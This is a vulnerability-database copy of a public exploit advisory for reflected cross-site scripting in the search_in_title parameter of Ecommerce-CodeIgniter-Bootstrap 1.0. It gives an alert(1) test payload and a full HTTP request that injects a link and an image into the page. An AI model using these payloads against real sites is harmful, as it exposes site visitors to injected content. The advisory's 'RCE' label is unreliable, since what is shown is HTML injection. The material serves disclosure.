Vulners
Lucene search
Ecommerce CodeIgniter Bootstrap 1.0 Cross Site Scripting
`## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE
## Author: nu11secur1ty
## Date: 10.29.2022
## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap
## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap
## Description:
The value of the search_in_title request parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the
search_in_title parameter.
The malicious user can use this vulnerability to exploit every user of
this system to make them a bot machine and etc.
[+] Exploit:
```POST
GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
# Proof and Exploit:
[href](https://streamable.com/y3q67i)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Oct 2022 00:00Current
0.4Low risk
Vulners AI Score0.4